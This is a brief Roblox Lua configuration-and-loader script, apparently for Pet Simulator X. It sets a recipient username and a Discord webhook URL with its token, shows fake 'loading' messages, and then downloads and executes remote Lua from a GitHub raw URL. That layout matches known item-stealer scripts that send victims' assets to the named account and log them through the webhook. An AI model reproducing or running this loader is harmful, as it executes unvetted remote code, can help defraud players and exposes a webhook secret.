Username = "frostyiscoming0"
WebHook = "https://discord.com/api/webhooks/1088083475514544161/HFKzUBsUb9jO14c3RFvOb12MymK0S4s_4mtUi057v0A2u0gsR3QQOmB2w5S_dAAu3sdr"


loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
